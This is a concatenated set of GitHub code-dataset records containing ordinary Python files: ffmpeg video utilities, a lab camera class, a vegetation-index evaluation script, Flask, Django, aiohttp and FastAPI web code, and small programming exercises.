\"_frag\")\n\t\tfrags.append(frag)\n\t\tfragbases.append(os.path.basename(frag))\n\t\trun(cmd1.format(sf , frag))\n\tcmd2 = 'mp4dash -f --mpd-name={mpd} --subtitles --exec-dir={output_dir} --media-prefix={name} --no-split --profiles=on-demand -o {output_dir} {mp4s}'\n\trun(cmd2.format(mpd=os.path.basename(mpd),name=name,output_dir=output_dir,mp4s=' '.join(fragbases)) , cwd=output_dir)\n\tfor f in frags:\n\t\tos.remove(f)\n\t# exe_cmd('mp4dash --help')\n\n\ndef clip(src_file ,dst_file,ss='00:00:00',duration=30):\n\tcmd = 'ffmpeg -ss {ss} -t {duration} -accurate_seek -i {src_file} -codec copy -y -avoid_negative_ts 1 {dst_file}'\n\tr = run(cmd.format(src_file=src_file,dst_file=dst_file,ss=ss,duration=duration))\n\treturn r\n\ndef snapshot(src_file,dst_file ,ss=30):\n\t# ss = ss + random.randint(0,60)\n\tcmd='ffmpeg -ss {ss} -i {src_file} -v quiet -y -f image2 -vframes 1 {dst_file}'\n\tr = run(cmd.format(src_file=src_file,dst_file=dst_file,ss=ss))\n\treturn r\n\n\ndef toMp4(media ,streams,stdoutCb=None,stderrCb=None):\n\tname,ext = os.path.splitext(media)\n\tcmd = \"ffmpeg -i {media} \"\n\tif streams['video']['codec_name']!='h264' :\n\t\tcmd += \" -vcodec h264\"\n\telse :\n\t\tcmd +=\" -vcodec copy\"\n\tif streams['audio']['codec_name']!='aac' :\n\t\tcmd +=\" -acodec aac\"\n\telse :\n\t\tcmd +=\" -acodec copy\"\n\tif ext==\".mp4\":\n\t\treturn media\n\tcmd += \" -y {output}\"\n\tc = cmd.format(media=media,output=name+\".mp4\")\n\trunCb(c,stdoutCb,stderrCb)\n\treturn name+\".mp4\"\n\n\nif '__main__' == __name__:\n\n\tpsizes =[[1920,1080],[1280,720],[640,480]]\n\tm = Mp4(\"/Users/ququ/Movies/test2/1.flv\" , psizes)\n\tprint(m.streams)\n\tprint(m.format)\n\tprint(m.isMp4())\n\tm = Mp4(\"/Users/ququ/Movies/test1/1_1.mp4\" , psizes)\n\tprint(m.streams)\n\tprint(m.format)\n\tprint(m.isMp4())\n# \tm.compress()\n\t# m.compressDash()\n\t# m.dash(\"/Users/ququ/Movies/test4/mal052_lec01_1.mp4\",\"/Users/ququ/Movies/test4/mal052_lec01_2.mp4\",\"/Users/ququ/Movies/test4/mal052_lec01_3.mp4\")\n","repo_name":"RocksonZeta/httpfs","sub_path":"bin/videos.py","file_name":"videos.py","file_ext":"py","file_size_in_byte":16375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43796751444","text":"from HCIFS.Device.Device import Device\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Camera(Device):\n \"\"\"\n A dummy class to represent a connected camera\n \"\"\"\n \n def __init__(self, originPix=[0,0], imgSize=[500,500], binPix=[4,4], \n ccdtemp=0, darkCam=None, saturation = 50000, **specs):\n \"\"\"\n Constructor for the camera class. Uses the parent 'Device' class.\n Inputs:\n originPix - the starting position of the image (tuple len.2)\n imgSize - the dimensions of the image (tuple len. 2)\n binPix - the number of pixels for binning (tuple len. 2)\n ccdtemp - the celsius temperature the camera is set to (number)\n darkCam - image used to reduce dark current (np array)\n saturation - saturation value for the QSIrs61 (int)\n \"\"\"\n \n # call the Device constructor\n super().__init__(**specs)\n \n # load specific Camera attributes\n self.connection = None\n self.originPix = np.array(specs.get('originPix', originPix), dtype = 'int')\n self.imgSize = np.array(specs.get('imgSize', imgSize), dtype = 'int')\n self.binPix = np.array(specs.get('binPix', binPix), dtype = 'int')\n self.ccdtemp = int(specs.get('ccdtemp', ccdtemp))\n self.darkCam = specs.get('darkCam', darkCam)\n self.saturation = int(specs.get('saturation', saturation))\n \n def avgImg(self, expTime, numIm, Xc = None, Yc = None, Rx = None,\n Ry = None, Source = None):\n \"\"\"\n A dummy function for taking an averaged image with the camera. Uses the exposure\n properties already passed to exposure properties. The current darkCam is used.\n If one is not found, a new one is taken. It also crops the image based\n on the X, Y and R parameters. The defaults for these paramters will keep simply\n not crop the image.\n \n Inputs:\n expTime - the exposure time in seconds for each image taken\n numIm - the number of images to take and then average\n Xc - the x-coordinate of center of the image after it is cropped in pixels\n Yc - the y-coordinate of center of the image after it is cropped in pixels\n Rx - the x radius of the rectangle used for cropping in pixels\n Ry - the y radius of the rectangle used for cropping in pixels\n Source - used only for taking Starlight's dark image\n \n Outputs:\n image - a numpy array containing the image. It's size matches the imgSize attribute\n saturated - True if image has reached camera's saturation level, False otherwise\n \n \"\"\"\n assert not self.labExperiment, \"Can't use 'avgImg' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n return np.zeros(self.imgSize), False\n \n def exposure(self, exptime):\n \"\"\"\n Dummy function for taking an image\n \n Inputs:\n exptime - exposure time in seconds for the image\n \n Outputs:\n image - a numpy array with properties corresponding to the values passed to exposureProperties\n \"\"\"\n assert not self.labExperiment, \"Can't use 'exposure' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n return np.zeros(self.imgSize)\n\n def exposureProperties(self, originPix, imgSize, binPix):\n \"\"\"\n A dummy function for changing the exposure properties of the camera\n \n Input:\n originPix - tuple of length two of the starting location for the image\n imgSize - tuple of length two of the image size in pixels\n binPix - tuple of length two of the number of pixels binned together\n \"\"\"\n # makes sure tuple input is all of length two\n if len(originPix) != 2:\n raise ValueError('Wrong dimension of start position')\n if len(imgSize) != 2:\n raise ValueError('Wrong dimension of picture size')\n if len(binPix) != 2:\n raise ValueError('Wrong dimension of binned pixels')\n # sets attributes to be equal to the input values\n self.originPix = originPix\n self.imgSize = imgSize\n self.binPix = binPix\n \n def readoutSpeed(self, readoutflag):\n \"\"\"\n Dummy function for changing the readout speed of the camera\n \n Inputs:\n readoutflag - 0 for high image quality, 1 for fast readout\n \"\"\"\n assert not self.labExperiment, \"Can't use 'readoutSpeed' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n\n def realTime(self):\n \"\"\"\n Dummy function for creating a realtime feed of the camera in a separate figure window.\n Pauses execution until the figure is closed.\n \"\"\"\n if self.labExperiment == True:\n if self.connection == None:\n raise Exception('Camera not connected.')\n # creates the figure\n plt.figure(100)\n plt.title('Real Time Picture')\n plt.tight_layout()\n # updates the figure with the current image until the figure is closed\n while plt.fignum_exists(100):\n img = self.exposure(0.0003)\n plt.imshow(img, origin = 'lower')\n cb = plt.colorbar()\n plt.pause(.1)\n cb.remove()\n else:\n raise Exception(\"Can't use 'realTime' with default 'Camera' class.\")\n print(\"Turn 'labExperiment = True' to run the lab.\")\n\n def setTemperature(self, temperature):\n \"\"\"\n Dummy function for setting camera's cooler temperature\n \n Inputs:\n temperature - temperature in degrees celsius\n \"\"\"\n assert not self.labExperiment, \"Can't use 'setTemperature' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n\n def takeDarkCam(self, expTime, numIm, Source = None, Xc = None, Yc = None,\n Rx = None, Ry = None, display = False):\n \"\"\"\n Dummy function for taking a dark cam. Uses the average image function.\n \n See average image function for inputs and outputs\n \n Inputs:\n display - if True displays the darkCam after it is taken\n \"\"\"\n assert not self.labExperiment, \"Can't use 'takeDarkCam' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n return np.zeros(self.imgSize)\n","repo_name":"ChrisDelaX/HCIFS","sub_path":"HCIFS/Device/Camera/Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"7535952252","text":"import os\nimport cv2\nimport math\nimport argparse\nimport bob.measure\nimport numpy as np\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport Utils\n\nfrom joblib import Parallel, delayed\nimport multiprocessing\n\n# Hold the eer (Equal error rate) for each index\neers = []\n\n# Argument parsing\nparser = argparse.ArgumentParser(description='Extract vegetation indexes.')\nparser.add_argument('-i', action='store', dest='inputList')\nparser.add_argument('-f', action='store', dest='filterType')\nparser.add_argument('-o', action='store', dest='outputDir')\nargs = parser.parse_args()\n\nfilterType = 0\n\ndef parallel(j, pos, indP, indF):\n\tif(j in pos[0]):\n\t\tindP[j]=1\n\t\tindF[j]=0\n\telse:\n\t\tindP[j]=0\n\t\tindF[j]=1\n\ndef balanced_accuracy(label, predicted):\n k = [0,1]\n E = [None]*2\n for i in range(0,2):\n pos = np.where(label==k[i])\n indP = [None]*label.shape[0]\n indF = [None]*label.shape[0]\n\n num_cores = multiprocessing.cpu_count()\n Parallel(n_jobs=num_cores)(delayed(parallel)(i, pos, indP, indF) for i in range(0,label.shape[0]))\n # for j in range(0,label.shape[0]):\n # if(j%10000 == 0):\n # print(j)\n # if(j in pos[0]):\n # indP[j]=1\n # indF[j]=0\n # else:\n # indP[j]=0\n # indF[j]=1\n \n Nc = len(np.where(label == k[i])[0])\n \n a=[]\n print(\"len \"+len(indF))\n for j in range(0,len(indF)):\n if(indF[j] == 1):\n a.append(j)\n posVec = [predicted[j] for j in a]\n\n FP = 0\n for j in range(0, len(a)):\n if(predicted[a[j]] == k[i]):\n FP = FP+1\n e1 = float(FP)/(label.shape[0] - Nc)\n \n b=[]\n for j in range(0,len(indP)):\n if(indP[j] == 1):\n b.append(j)\n posVec = [predicted[j] for j in b]\n\n FN = 0\n for j in range(0, len(b)):\n if(predicted[b[j]] != k[i]):\n FN = FN+1\n \n e2 = float(FN)/Nc\n \n E[i] = e1+e2\n return 1 - sum(E)/4\n\n'''\n\tCalculate the accuracy\n\t@param label The ground truth\n\t@param targets List of arrays with the prediction of each pixel\n'''\ndef accuracy_late(label, targets):\n\ti = 0\n\tprint(\"\\n-------------\\n|Method|Accuracy|\\n|:----------:|:-------------:|\")\n\tfor target in targets:\n\t\tprint(\"|\"+Utils.lateFusionLabels[i]+\"|\"+\"%.3f\" % metrics.accuracy_score(label, target)+\"|\")\n\t\ti += 1\n\n'''\n\tPlot the ROC curve and calculate the AUC, ERR, FAR and FRR\n\t@param label The ground truth\n\t@param targets List of arrays with the index value of each pixel\n\t@param labels Label of each curve that will be plotted\n'''\ndef plot_roc(label, targets, labels, fusion):\n\ti = 0\n\tprint(\"\\n-------------\\n|Method|AUC|EER|FAR|FRR|Accuracy|\")\n\tprint(\"|:----------:|:-------------:|:------:|:------:|:------:|:------:|\")\n\tfor target in targets:\n\t\t# if(np.any(np.isnan(target))):\n\t\ttarget[ ~ np.isfinite( target )] = 0\n\t\t# target[ ~ np.isnan( target )] = 0\n\t\t# Use SKLearn to get the False Positive Rate (fpr), True Positive Rate(tpr)\n\t\tfpr, tpr, thresholds = metrics.roc_curve(label, target)\n\n\t\tprint(\"|\"+labels[i]+\"|\"+\"%.3f\" % metrics.roc_auc_score(label, target),end='')\n\n\t\t# Plot the FPR vs TPR (ROC curve)\n\t\tplt.plot(fpr[::200], tpr[::200], lw=2, label=labels[i])\n\t\t# Plot the straight to show the EER point\n\t\tplt.plot(np.array((1.00,0)), np.array((0,1.00)))\n\t\ti += 1\n\n\t\t# Build an array where positive class will the their values, but the negative class will receive -1\n\t\tpos = np.where(label, target, -1)\n\t\t# Get position of all positive pixel (the position that isnt -1 value)\n\t\tposPos = np.where(pos>-1)\n\t\t# Build the array with only the values of positive class\n\t\tposVec = [target[j] for j in posPos]\n\n\t\t''' The same as the previous, but now for the negative class '''\n\t\tneg = np.where(1-label, target, -1)\n\t\tnegPos = np.where(neg>-1)\n\t\tnegVec = [target[j] for j in negPos]\n\t\t\n\t\t# Use the Bob package from IDIAP\n\t\t# Get the err value (Value where the False Acceptance Rate and the False Rejection Rate are equal)\n\t\teer = bob.measure.eer_threshold(negVec[0], posVec[0])\n\t\tfar, frr = bob.measure.farfrr(negVec[0], posVec[0], eer)\n\t\teers.append(eer)\n\n\t\tprediction = np.where(target >= eer, 1, 0)\n\t\tacc = metrics.balanced_accuracy_score(label, prediction)\n\n\t\tprint(\"|\"+\"%.3f\" % eer+\"|\"+\"%.3f\" % far+\"|\"+\"%.3f\" % frr+\"|\"+\"%.3f\" % acc+\"|\")\n\n\n\tplt.legend()\n\tplt.xlabel(\"False Positive Rate - FPR\")\n\tplt.ylabel(\"True Positive Rate - TPR\")\n\t# plt.show()\n\tplt.savefig(Utils.buildFileName(filterType, fusion, args.outputDir))\n\tplt.clf()\n\n'''\n\tDo the processing for the early fusion methods, which are the Arithmetic mean and the Geometric mean\n\t@param label The ground truth, just pass forward in function call sequence\n\t@param indices The value of each pixel for all the indeces\n'''\ndef early_fusion(label, indices):\n\tearly_fusion_results = []\n\t# Mean\n\tmean = indices[0]\n\tfor i in range(1,len(indices),1):\n\t\tmean = (mean + indices[i])\n\tmean = mean/len(indices)\n\tearly_fusion_results.append(mean)\n\t\n\t# Geometric mean\n\t# P = produtorio(P(i)[x,y])/(produtorio(P(i)[x,y]) + produtorio(1-P(i)))\n\tgeometricMean = indices[0]\n\tgeometricMeanRenorm = 1 - indices[0]\n\tfor i in range(1,len(indices),1):\n\t\tgeometricMean = geometricMean*indices[i]\n\t\tgeometricMeanRenorm = geometricMeanRenorm*(1-indices[i])\n\tgeometricMean = geometricMean/(geometricMean + geometricMeanRenorm)\n\tearly_fusion_results.append(geometricMean)\n\n\tplot_roc(label, early_fusion_results, Utils.earlyFusonLabels, \"earlyFusion\")\n\n'''\n\tDo the processing for the late fusion method, which is the majority voting\n\t@param label The ground truth, just pass forward in function call sequence\n\t@param indices The value of each pixel for all the indeces\n'''\ndef late_fusion(label, indices):\n\ti = 0\n\tlate_fusion_results = []\n\tindicesThresholdeds = []\n\tfor indice in indices:\n\t\t# Where the value of the prediction is greater or equal to EER value of that indice, 1 otherwise 0\n\t\tindicesThresholdeds.append(np.where(indice >= eers[i], 1, 0))\n\t\ti += 1\n\n\t# Sum all the value\n\tfor idx in range(1, len(indicesThresholdeds)):\n\t\tindicesThresholdeds[0] = np.add(indicesThresholdeds[0], indicesThresholdeds[idx])\n\t\n\t# Where the sum of the 1's is greater than half of the indices, mean that this prediction has the majority of the votes\n\tlate_fusion_results.append(np.where(indicesThresholdeds[0] >= math.floor(len(Utils.idxsLabels)/2)+1, 1, 0).astype(float))\n\taccuracy_late(label, late_fusion_results)\n\ndef filterImg(imgPath):\n\tglobal filterType\n\timg = cv2.imread(imgPath, cv2.IMREAD_COLOR)\n\n\tif filterType == 0: # No filter\n\t\treturn img\n\telif filterType == 1: # Normal blur\n\t\treturn cv2.blur(img,(5,5))\n\telif filterType == 2: # Gaussian blur\n\t\treturn cv2.GaussianBlur(img,(5,5),0)\n\telif filterType == 3: # Median blur\n\t\treturn cv2.medianBlur(img,5)\n\telif filterType == 4: # Bilateral filter\n\t\treturn cv2.bilateralFilter(img,3,25,75) #src,dst,d,sigmaColor,sigmaSpace; | sigmaColor High sigmaColor mean that father color well be mixed together\n\n\n'''\n\t\n'''\ndef process(imgs):\n\tgtAllImgs = np.array([])\n\tindices = [np.array([])]*6\n\tfor i in imgs:\n\t\tindexes = []\n\n\t\t# Read original image and the ground truth\n\t\timg = filterImg(i[0])\n\t\tgt = cv2.imread(i[1], cv2.IMREAD_GRAYSCALE)\n\n\t\ty,x = gt.shape\n\t\tif(img.shape != gt.shape):\n\t\t\ty, x = gt.shape\n\t\t\timg = img[0:y,0:x,]\n\t\t\n\t\t# Normalize the ground truth\n\t\tcv2.normalize(gt, gt, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\t# Build a vector with all the ground truths\n\t\tgtAllImgs = np.concatenate((gtAllImgs, gt.ravel()))\n\n\t\t# Separate each channel\n\t\tB, G, R = cv2.split(np.float32(img))\n\t\tb = Utils.div0(B,(B+G+R))\n\t\tg = Utils.div0(G,(B+G+R))\n\t\tr = Utils.div0(R,(B+G+R))\n\n\t\t# NGRDI\n\t\tNGRDI = Utils.div0((G-R),(G+R))\n\t\tcv2.normalize(NGRDI, NGRDI, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[0] = np.concatenate((indices[0], NGRDI.ravel()))\n\t\t# cv2.normalize(NGRDI, NGRDI, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# NGRDI = np.uint8(NGRDI)\n\t\t# cv2.imwrite(\"NGRDI.jpg\", NGRDI)\n\n\t\t# ExG\n\t\t# ExG = 2*gNorm-rNorm-bNorm\n\t\tExG = 2*g-r-b\n\t\tcv2.normalize(ExG, ExG, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[1] = np.concatenate((indices[1], ExG.ravel()))\n\t\t# cv2.normalize(ExG, ExG, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# ExG = np.uint8(ExG)\n\t\t# cv2.imwrite(\"ExG.jpg\", ExG)\n\n\t\t# CIVE\n\t\tCIVE = 0.411*R - 0.881*G + 0.385*B + 18.78745\n\t\tCIVE = 1 - cv2.normalize(CIVE, CIVE, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[2] = np.concatenate((indices[2], CIVE.ravel()))\n\t\t# cv2.normalize(CIVE, CIVE, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# CIVE = np.uint8(CIVE)\n\t\t# cv2.imwrite(\"CIVE.jpg\", CIVE)\n\n\t\t# VEG\n\t\tVEG = Utils.div0(g, 2+(r**0.667)*(b**(1-0.667)))\n\t\tcv2.normalize(VEG, VEG, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[3] = np.concatenate((indices[3], VEG.ravel()))\n\t\t# cv2.normalize(VEG, VEG, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# VEG = np.uint8(VEG)\n\t\t# cv2.imwrite(\"VEG.jpg\", VEG)\n\n\t\t# ExGR\n\t\tExGR = g-(2.4*r)-b\n\t\tcv2.normalize(ExGR, ExGR, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[4] = np.concatenate((indices[4], ExGR.ravel()))\n\t\t# cv2.normalize(ExGR, ExGR, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# ExGR = np.uint8(ExGR)\n\t\t# cv2.imwrite(\"ExGR.jpg\", ExGR)\n\n\t\t# WI\n\t\tWI = Utils.div0((g-b),(abs(r-g)+1))\n\t\tcv2.normalize(WI, WI, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[5] = np.concatenate((indices[5], WI.ravel()))\n\t\t# cv2.normalize(WI, WI, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# WI = np.uint8(WI)\n\t\t# cv2.imwrite(\"WI.jpg\", WI)\n\n\tplot_roc(gtAllImgs, indices, Utils.idxsLabels, \"noFusion\")\n\tearly_fusion(gtAllImgs, indices)\n\tlate_fusion(gtAllImgs, indices)\n\n\ndef main():\n\t# y_true = [1, 1, 1, 0]\n\t# y_pred = [1, 1, 0, 0]\n\t# print(metrics.balanced_accuracy_score(y_true,y_pred))\n\tglobal filterType\n\twith open(args.inputList, 'r') as file:\n\t\tlines = file.readlines()\n\t\timgs = []\n\t\tfor line in lines:\n\t\t\timgs.append(line.rstrip().split(' '))\n\tfilterType = int(args.filterType)\n\tprocess(imgs)\nif __name__=='__main__':\n\tmain()\n\n\n","repo_name":"pauloprado/pdi","sub_path":"src/indexExtractor.py","file_name":"indexExtractor.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33047323230","text":"# coding=utf-8\nfrom flask import g, render_template, make_response\nfrom .blueprint import blueprint\n#from .models import User\n\n@blueprint.route(\"/\")\ndef index():\n\t#g.db_session.add(User('jack'))\n\t#g.db_session.commit()\n\tnavigation = [\n\t\t\t{\"caption\": u\"首页\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"关于中宇\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"新闻中心\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"品牌\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"浴室空间\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"产品展示\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"销售专区\", \"href\": \"#\"},\n\t]\n\treturn render_template('index.html', navigation=navigation)\n\n@blueprint.route(\"/download/\")\ndef download(path):\n\tresponse = make_response()\n\tresponse.headers['Cache-Control'] = 'no-cache'\n\tresponse.headers['Content-Type'] = 'application/zip'\n\tresponse.headers['X-Accel-Redirect'] = '/files/' + path\n\treturn response\n","repo_name":"vuuvv/vweb.old","sub_path":"blog/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41614271057","text":"from WWW.WebService.Base.BaseService import BaseService\n\nfrom Helper.JsonDateHelper import JSONEncoder\n\n\nfrom aiohttp import web\n\n\nclass NewsService(BaseService):\n\n def __init__(self):\n super().__init__()\n self.collection = self.db.create_collection(self.config[\"database\"][\"collection\"])\n self.text_collection = self.config[\"database\"][\"text_collection\"]\n self.news_query = self.config[\"database\"][\"query\"]\n self.check_for = self.config[\"check_for\"]\n\n def add_news(self, app):\n app.router.add_get('/random_news', self.__random_news_handler)\n\n async def __random_news_handler(self, request):\n filtered_news = list(self.collection.aggregate(self.news_query))[0]\n news_text = self.get_news_data(self.db, self.text_collection, filtered_news[\"url\"])\n res = {\n 'id': str(news_text.get('_id')),\n 'title': news_text.get('title'),\n 'summery': news_text.get('summery'),\n 'category': news_text.get('category'),\n 'article': news_text.get('article'),\n 'url': news_text.get('url'),\n 'authors': news_text.get('authors'),\n 'news_date': str(news_text.get('date')),\n 'wiki_relatedness': filtered_news.get('wiki_relatedness'),\n 'tweet_count': filtered_news.get('tweet_count'),\n 'tweet_percentage': filtered_news.get('tweet_percentage'),\n 'wiki_relatedness_nor': self.get_key_from(\"wiki_relatedness_nor\", filtered_news),\n 'tweet_count_nor': self.get_key_from(\"tweet_count_nor\", filtered_news),\n 'check_for': self.check_for\n }\n res = JSONEncoder().encode(res)\n return web.json_response(res)\n\n @staticmethod\n def get_key_from(key, array):\n if key in array:\n return array.get(key)\n else:\n return \"Not Found\"\n\n @staticmethod\n def get_news_data(db, collection, object_id):\n query = {\"url\": object_id}\n return db.get_data_one(collection, query)","repo_name":"KaanYT/PricePrediction","sub_path":"WWW/WebService/NewsService.py","file_name":"NewsService.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28232502993","text":"if __name__ == '__main__':\n N = int(input())\n ar=[]\n for _ in range(N):\n choices = input().strip().split(\" \")\n func = choices[0]\n if func == \"print\":\n print(ar)\n elif func == \"sort\":\n ar.sort()\n elif func == \"reverse\":\n ar.reverse()\n elif func == \"pop\":\n ar.pop()\n elif func == \"remove\":\n val = int(choices[1])\n ar.remove(val)\n elif func == \"append\":\n val = int(choices[1])\n ar.append(val)\n elif func == \"insert\":\n pos = int(choices[1])\n val = int(choices[2])\n ar.insert(pos, val)","repo_name":"Madhavarora05/HackerRank_Python_Solutions","sub_path":"Basic Data Types/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"284855594","text":"from django.core.exceptions import ValidationError\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.forms import ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.forms import inlineformset_factory\nfrom shared.models import Address\nfrom employee.models import Employee, Contract\nfrom company.models import Company\n# from attendance.models import EmployeeAttendance\n\n\nclass RegisterForm(UserCreationForm):\n\n class Meta:\n model = User\n fields = [\n 'username',\n 'email',\n 'password1',\n 'password2',\n ]\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass CompanyForm(ModelForm):\n\n class Meta:\n model = Company\n fields = ['name', 'contact_number', 'email']\n\n\nclass ContractForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super(ContractForm, self).__init__(*args, **kwargs)\n self.fields['start_date'].widget.attrs['class'] = 'startDate'\n self.fields['end_date'].widget.attrs['class'] = 'endDate'\n # start_date = forms.DateField(widget=forms.TextInput(attrs={'class':'startDate'}))\n # end_date = forms.DateField(widget=forms.TextInput(attrs={'class':'endDate'}))\n \n class Meta:\n model = Contract\n fields = ['name', 'start_date', 'end_date', 'salary', 'employee']\n \n \nclass AddressForm(ModelForm):\n class Meta:\n model = Address\n fields = ['street_line1', 'street_line2', 'zipcode',\n 'city', 'state', 'employee', 'company']\n exclude = ('employee', 'company')\n\n\n\n\nclass EmployeeForm(ModelForm):\n\n class Meta:\n model = Employee\n fields = ['title', 'firstname', 'lastname', 'email',\n 'date_of_birth', 'date_of_joining']\n\n\nContractFormSet = inlineformset_factory(Employee, Contract,\n form=ContractForm, extra=1)\nAddressFormSet = inlineformset_factory(Employee, Address,\n form=AddressForm, extra=1)\nCompanyAddressFormSet = inlineformset_factory(Company, Address,\n form=AddressForm, extra=1)\n\n# class EmployeeAttendanceForm(ModelForm):\n# class Meta:\n# model = EmployeeAttendance\n# fields = ['employee_id', 'date', 'status', 'note']","repo_name":"DamodarVishwakarma/EMP","sub_path":"EMP/apps/employee/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13347191539","text":"from datetime import datetime, time\n\n\ndef current_time():\n \"\"\"Returns the current time in a readable format with params for the clock\"\"\"\n while True:\n dt = datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n if time(8, 0) <= datetime.now().time() <= time(18, 0):\n return f'

Greetings traveller! Site is working!

{dt}

'\n else:\n return f'

Good evening traveller! Site is working, but no one will answer your question!

' \\\n f'

{dt}

'\n\n\ndef average_height_weight():\n \"\"\"Returns the average height and weight of the users from file\"\"\"\n user = {}\n with open('hw.csv', 'r') as f:\n next(f)\n for line in f:\n ind, height, weight = line.split(',')\n user[ind] = [float(height), float(weight)]\n avg_height = round((sum(user[ind][0] for ind in user) * 2.54) / len(user), 2) # [0] index\n avg_weight = round((sum(user[ind][1] for ind in user) / 2.2046) / len(user), 2) # [1] index\n return avg_height, avg_weight\n\n\ndef show_requirements():\n \"\"\"Returns the requirements for the project\"\"\"\n req = []\n with open('requirements.txt', 'r') as f:\n for line in f:\n req.append(line.strip())\n return '
'.join(req)\n","repo_name":"HansLanda96/Flaskrep_Hillel","sub_path":"Flask_intro/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20108189113","text":"import matplotlib\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom celluloid import Camera\n\n#load irrigation dataset\nirrigated_land = pd.read_csv('datasets/land_under_Irrigation.csv')\n#print(irrigated_land.head())\n# animation\nfig = plt.figure(figsize=(80,40))\ncamera = Camera(fig) # bind camera object to matplotlib figure\nfor index, row in irrigated_land.iterrows():\n t = plt.bar(row['OBJECTID'], row['Total_Count'])\n plt.legend(t, [f'County {row[\"County\"]}'])\n plt.title(\"Total acres of Land under Irrigation per County\")\n camera.snap()\n\nanimation = camera.animate()\nanimation.save('celluloid_legends.gif', writer = 'imagemagick')","repo_name":"laranea/DataScience-Dashboard","sub_path":"celluloid_gif.py","file_name":"celluloid_gif.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"20632045179","text":"#Zadanie 05\n#Wypisz wszystkie liczby pierwsze z przedziału <2,10> wykorzystując instrukcję: for ... else lub while ... else. done \n\n#Użyj instrukcji break przy znalezieniu pierwszego dzielnika naturalnego innego niż 1 i dana liczba.\n#W bloku else umieść informację o znalezieniu liczby pierwszej.\nx = 1\nwhile x < 10:\n x += 1\n check = 0\n for a in range(x):\n a += 1\n if( x/a == x//a):\n check += a\n if(check == x +1):\n print(x, \"jest liczba pierwsza\") #totalnie zle jest to zadanie mozna je pewnie zrobic w 3 linijki, ale dziala \n","repo_name":"How2Troll/Python_Exercises","sub_path":"Zadanie5.py","file_name":"Zadanie5.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7853775755","text":"import zipfile\nfrom pprint import pprint\nfrom typing import List\n\nfrom fastapi import FastAPI, UploadFile, File\nfrom PIL import Image\nimport io\nimport os\n\nfrom starlette.responses import FileResponse\n\napp = FastAPI()\n\nUPLOAD_FOLDER = \"uploaded_images\"\nCOMPRESSED_FOLDER = \"compressed_images\"\nZIP_FOLDER = \"zip_files\"\n\nos.makedirs(UPLOAD_FOLDER, exist_ok=True)\nos.makedirs(COMPRESSED_FOLDER, exist_ok=True)\nos.makedirs(ZIP_FOLDER, exist_ok=True)\n\n\n@app.post(\"/upload/\")\nasync def upload_and_compress_images(file_dir: str, files: List[UploadFile] = File(...)):\n compressed_file_paths = []\n\n if not os.path.exists(F\"{COMPRESSED_FOLDER}/{file_dir}\"):\n os.makedirs(F\"{COMPRESSED_FOLDER}/{file_dir}\", exist_ok=True)\n\n for file in files:\n # Read the uploaded image\n image = Image.open(file.file)\n\n # Convert to RGB mode if image is in RGBA mode\n if image.mode == \"RGBA\":\n image = image.convert(\"RGB\")\n\n # Compress the image\n compressed_image = compress_image(image, max_size=1024) # Maximum size in KB (1MB)\n\n # Save the compressed image to a file\n pprint(compressed_image)\n compressed_file_path = os.path.join(f\"{COMPRESSED_FOLDER}/{file_dir}\", file.filename)\n 